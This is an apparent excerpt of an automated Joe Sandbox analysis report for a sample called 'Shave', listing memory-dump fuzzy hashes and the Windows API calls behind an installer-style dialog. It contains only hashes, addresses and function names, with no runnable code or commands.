                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ea3bb76e0ea1fa247e9c34c17a89ef15bf4545db74caa4f9804ee968dae60135
                                                                                                                                • Instruction ID: 62f66611d683037e452956b915b7a7d837c35607c3afa638898f8f551a0494c3
                                                                                                                                • Opcode Fuzzy Hash: ea3bb76e0ea1fa247e9c34c17a89ef15bf4545db74caa4f9804ee968dae60135
                                                                                                                                • Instruction Fuzzy Hash: B5D1A074E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E86CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7a7b3ca147c48f4886c8a9c1ee953988eb53caa94c782e85fece57c845ad2bc3
                                                                                                                                • Instruction ID: cd9a35d81b25a8765387f2b6902d1cd259ffe22090090880ef4c3845600987ab
                                                                                                                                • Opcode Fuzzy Hash: 7a7b3ca147c48f4886c8a9c1ee953988eb53caa94c782e85fece57c845ad2bc3
                                                                                                                                • Instruction Fuzzy Hash: D0D1AF74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB355DB35AE86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fddfb89004285f83f7d3422b0e9e749a8ba1e0c6730cdc05f45e4f2e0af3150a
                                                                                                                                • Instruction ID: 6f8fbdf7930b919d946c26dee3e7f251103b48117953b812da70e5ceb11bd7a4
                                                                                                                                • Opcode Fuzzy Hash: fddfb89004285f83f7d3422b0e9e749a8ba1e0c6730cdc05f45e4f2e0af3150a
                                                                                                                                • Instruction Fuzzy Hash: 77D19F78E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 22e2fb861efb6157fb3c79a28eeb8362bf0eba6851ba793c2df1d698d7539455
                                                                                                                                • Instruction ID: 1e6bf6294dd17ad64ad4ac94eb867d72ea7983506e6bd48116baf2a1cc14dbaa
                                                                                                                                • Opcode Fuzzy Hash: 22e2fb861efb6157fb3c79a28eeb8362bf0eba6851ba793c2df1d698d7539455
                                                                                                                                • Instruction Fuzzy Hash: 3AD19F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f74fff2e1c7484e43d194c8cf306e43e97a7deaed8d6ad919d6e784207cbb9a4
                                                                                                                                • Instruction ID: 0c18958ed53ec6a6e3d2ba21cd7f9f9334a594876ef3bda9841faccfcdd95e16
                                                                                                                                • Opcode Fuzzy Hash: f74fff2e1c7484e43d194c8cf306e43e97a7deaed8d6ad919d6e784207cbb9a4
                                                                                                                                • Instruction Fuzzy Hash: A9D19F74E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB355DB35AE86CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0ad5e38f0836850b5525f4724dac501833c4b6a5232f1a6a7a171c8720b5843f
                                                                                                                                • Instruction ID: d084c56393512e519fdc44831083e215c9b3d622ae42e52504d5bfb92c2e4ff3
                                                                                                                                • Opcode Fuzzy Hash: 0ad5e38f0836850b5525f4724dac501833c4b6a5232f1a6a7a171c8720b5843f
                                                                                                                                • Instruction Fuzzy Hash: 22D1A074E01218CFDB54EFA5C984B9DBBB2BF89300F2081A9D409AB355DB359E86CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 34d7c5eace304f269ccdaf15b6675b50f616601b1117c58dd4e01046c746196f
                                                                                                                                • Instruction ID: 4926afebd8bd25ae5a6113b40be8e55c228a5e6552a5eb3306f81732d20b9263
                                                                                                                                • Opcode Fuzzy Hash: 34d7c5eace304f269ccdaf15b6675b50f616601b1117c58dd4e01046c746196f
                                                                                                                                • Instruction Fuzzy Hash: 9BD1A174E04218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB355DB35AE86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fa3f33116a9249eb46a758ecf6f7a83f10e43df975307f31e4151c4c123cb8bd
                                                                                                                                • Instruction ID: 14c891abafb119c261d23fc22535573f66ccb82a4c7d10aca6aea0b066637be5
                                                                                                                                • Opcode Fuzzy Hash: fa3f33116a9249eb46a758ecf6f7a83f10e43df975307f31e4151c4c123cb8bd
                                                                                                                                • Instruction Fuzzy Hash: 76D19E74E012188FDB54DFA5C994B9DBBB2BF89300F2081A9D409BB355DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e96e0a0c4e6e6b24444299ab60c5d8578ef4a24500eee68deb70c33ff1985032
                                                                                                                                • Instruction ID: fee9d80f15cc70377198e21e3004164a3737577b91a6aeed81e6bf0ae1706d27
                                                                                                                                • Opcode Fuzzy Hash: e96e0a0c4e6e6b24444299ab60c5d8578ef4a24500eee68deb70c33ff1985032
                                                                                                                                • Instruction Fuzzy Hash: F9D19174E01218CFDB54DFA5C994BADBBB2BF89300F2081A9D409AB355DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f1bee70d2d400ed07199c754c3a42b3445beec4d4698030a69916ea5d168c715
                                                                                                                                • Instruction ID: 0c9713a3063901462433d2cf9f58b7ec4459ff19b1bc5cbb9ac680451936269b
                                                                                                                                • Opcode Fuzzy Hash: f1bee70d2d400ed07199c754c3a42b3445beec4d4698030a69916ea5d168c715
                                                                                                                                • Instruction Fuzzy Hash: 09D19074E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E86CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 83078f9ac65728e411b9b68f6bae960b8dea28810327a485932afdf2ff814057
                                                                                                                                • Instruction ID: 707641c023a82d97e98e61e703302d42971fe82fcd654f351e6b9f9b20c3cc02
                                                                                                                                • Opcode Fuzzy Hash: 83078f9ac65728e411b9b68f6bae960b8dea28810327a485932afdf2ff814057
                                                                                                                                • Instruction Fuzzy Hash: 0BD19074E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB359E86CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d1a2116089f981b0bbf9e5fa528471d31a85768f7e441986a927dd49f1bd0d0a
                                                                                                                                • Instruction ID: b200c79957c03698b8aac39afa023c37c53b93a784f3bc4b0a2a1797fcda5ea7
                                                                                                                                • Opcode Fuzzy Hash: d1a2116089f981b0bbf9e5fa528471d31a85768f7e441986a927dd49f1bd0d0a
                                                                                                                                • Instruction Fuzzy Hash: 29D1BF74E04218CFDB54DFA5C984B9DBBB2BF89300F2081A9D409AB355DB35AE86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3f5a3dc14cf809fc2227bf9da5288bccd61948dbeb26b4657cebfbed6dd372a8
                                                                                                                                • Instruction ID: e65aa267b4f5bda27e8ab3cec0ee2e47fe6e8a174a0a9adc97e69e0213b52830
                                                                                                                                • Opcode Fuzzy Hash: 3f5a3dc14cf809fc2227bf9da5288bccd61948dbeb26b4657cebfbed6dd372a8
                                                                                                                                • Instruction Fuzzy Hash: FAD19F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f777c5789e7726dc4a028be9338a910e3a56f38d5258601ae79718673e2215f1
                                                                                                                                • Instruction ID: f989897316e2d7fd6ac1716e86fca57aad9a31339fe32bf23abfd2481b566263
                                                                                                                                • Opcode Fuzzy Hash: f777c5789e7726dc4a028be9338a910e3a56f38d5258601ae79718673e2215f1
                                                                                                                                • Instruction Fuzzy Hash: C5C19278E01218CFDB54DFA5C994B9DBBB2BF89300F1081A9D809AB365DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fa01fa9cdd7c009c89160f304c1f5aae054a54e9910d4b2113c05dc57930732b
                                                                                                                                • Instruction ID: 9e537c735ef4238b051afff7cfc4ee12a81a166a8ce2a99caff5aba1d6ee9050
                                                                                                                                • Opcode Fuzzy Hash: fa01fa9cdd7c009c89160f304c1f5aae054a54e9910d4b2113c05dc57930732b
                                                                                                                                • Instruction Fuzzy Hash: 54C19374E01218CFDB54DFA5C994B9DBBB2BF89300F1081A9D809AB355DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6437e356faee1f7a9e42284c11f201b71739bd867c1af7950906da6c7b58b1ab
                                                                                                                                • Instruction ID: f0bb98009cd8cc3c735a28212a2e1ab89aef961d6d0df3f57950e2bb42d932ec
                                                                                                                                • Opcode Fuzzy Hash: 6437e356faee1f7a9e42284c11f201b71739bd867c1af7950906da6c7b58b1ab
                                                                                                                                • Instruction Fuzzy Hash: 5EC1A274E01218CFDB54DFA5C994B9DBBB2BF89300F1081A9D409AB365DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f4ee685168f06bc02903eca48f485f645bf0edc94ef66c95dbc233d4e273a6ac
                                                                                                                                • Instruction ID: 04eac8bef66d80ef5cafa68fcfa1e62922b96fe49e70d588a79edf7090812217
                                                                                                                                • Opcode Fuzzy Hash: f4ee685168f06bc02903eca48f485f645bf0edc94ef66c95dbc233d4e273a6ac
                                                                                                                                • Instruction Fuzzy Hash: 06C1A178E00218CFDB54DFA5C994B9DBBB2BF89300F1080A9D809AB365DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 75fffa3b2c6b588b310f05653d7e72cd13233bda66ea7759e05305eb09e8903b
                                                                                                                                • Instruction ID: 809c1e94e3fae4adf344e242d4ce4ce620b0316e7192b22e67a89b240240919f
                                                                                                                                • Opcode Fuzzy Hash: 75fffa3b2c6b588b310f05653d7e72cd13233bda66ea7759e05305eb09e8903b
                                                                                                                                • Instruction Fuzzy Hash: 59C1A178E01218CFDB54DFA5C994B9DBBB2BF89300F5080A9D409AB365DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 81cbca9a2fd9e2ae94c008d0cb92f597216c7705136ca2722c97b20604a69ab0
                                                                                                                                • Instruction ID: 5e9641aa37bf58cc32495abeb28a316e9ef2614ae6fedfb366c09811ab09c31b
                                                                                                                                • Opcode Fuzzy Hash: 81cbca9a2fd9e2ae94c008d0cb92f597216c7705136ca2722c97b20604a69ab0
                                                                                                                                • Instruction Fuzzy Hash: 96C1A178E01218CFDB54DFA5C984B9DBBB2BF89300F1081A9D809AB365DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 581384bc5b2b7846bf7a5ac80139d605b1c592914484c758ec114afee2d8debd
                                                                                                                                • Instruction ID: 0b9232eba0e91678c951031cc732b16348624ffa94d11bdc9109141a75bf3a75
                                                                                                                                • Opcode Fuzzy Hash: 581384bc5b2b7846bf7a5ac80139d605b1c592914484c758ec114afee2d8debd
                                                                                                                                • Instruction Fuzzy Hash: 5BC19178E01218CFDB54DFA5C994B9DBBB2BF89300F1081A9D809AB365DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bdd146b25f6f91ccf313f2d027e9ff8e5d074e35bcfd0a650df50c79734d25b0
                                                                                                                                • Instruction ID: fc205f64cde160dd06be8a1095ac1070d9e6efa0b91af7dc2930ed34a24337ba
                                                                                                                                • Opcode Fuzzy Hash: bdd146b25f6f91ccf313f2d027e9ff8e5d074e35bcfd0a650df50c79734d25b0
                                                                                                                                • Instruction Fuzzy Hash: 67C19278E00218CFDB54DFA5C994B9DBBB2BF89300F1081A9D809AB365DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c113695c402111101a7af77f166919ac3bf5a4991ae9ada9393e1235c53293ed
                                                                                                                                • Instruction ID: ba2c7f36c4a8ee4c02f7eae92d30c60b954f63932e3f16df1b736fdd567e9cc8
                                                                                                                                • Opcode Fuzzy Hash: c113695c402111101a7af77f166919ac3bf5a4991ae9ada9393e1235c53293ed
                                                                                                                                • Instruction Fuzzy Hash: 02C1A274E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 04b6b0e856ab97abc544355a764ba4569d05cc619d70a7ed17da7d9cc3b01fad
                                                                                                                                • Instruction ID: 4936e84391e92446ca3e3c1a02c275ca23124db557b7b6a925d9aba8c409db3a
                                                                                                                                • Opcode Fuzzy Hash: 04b6b0e856ab97abc544355a764ba4569d05cc619d70a7ed17da7d9cc3b01fad
                                                                                                                                • Instruction Fuzzy Hash: 4AC1B274E00218CFDB54DFA9C994B9DBBB6BF89304F1080A9D809AB355DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bed1a8b9812ca5fb74978ff5b1662da66726003cb09e4421c02abac31b7f6b55
                                                                                                                                • Instruction ID: 6c77afe97debd4a4767e7d882fc4085262590f736416505556e11fd635114911
                                                                                                                                • Opcode Fuzzy Hash: bed1a8b9812ca5fb74978ff5b1662da66726003cb09e4421c02abac31b7f6b55
                                                                                                                                • Instruction Fuzzy Hash: D7910474A00268CFDB25DF24C954BADBBB6FF48340F208499D909673A5DB386E89CF15
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 93be774780085aeab448052a50fc1fda6c2dcbba844b0e7ff9163fa1e69558e1
                                                                                                                                • Instruction ID: a04bdc5f0fd60f821e48c5a0cde350d18fe9abd2bb63ca0919c870f719b06d59
                                                                                                                                • Opcode Fuzzy Hash: 93be774780085aeab448052a50fc1fda6c2dcbba844b0e7ff9163fa1e69558e1
                                                                                                                                • Instruction Fuzzy Hash: 80D06734D5435CCACB20EF64A8557AEB775AB95305F0021A6D41CAB110D7709A548B56
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                                                                                • GetClientRect.USER32(?,?), ref: 004054E8
                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                                                                                                                  • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405613
                                                                                                                                • ShowWindow.USER32(00000000), ref: 00405637
                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040563C
                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405686
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                                                                                                                • CreatePopupMenu.USER32 ref: 004056CB
                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004056FF
                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405760
                                                                                                                                • EmptyClipboard.USER32 ref: 00405766
                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                                                                                                                • CloseClipboard.USER32 ref: 004057C1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                • String ID: {
                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                • Opcode ID: 17a21c63557b4cf9ffe78a5fd5086114b1c8428fb936cdfcd18ae7c9549b7d0c
                                                                                                                                • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                                                                                                                • Opcode Fuzzy Hash: 17a21c63557b4cf9ffe78a5fd5086114b1c8428fb936cdfcd18ae7c9549b7d0c
                                                                                                                                • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                                                                                • ShowWindow.USER32(?), ref: 00403D8E
                                                                                                                                • DestroyWindow.USER32 ref: 00403DA2
                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403EA8
                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001), ref: 00403F1D
                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403FF6
                                                                                                                                • EnableWindow.USER32(?,?), ref: 00404011
                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                                                                                • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                                                                                • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
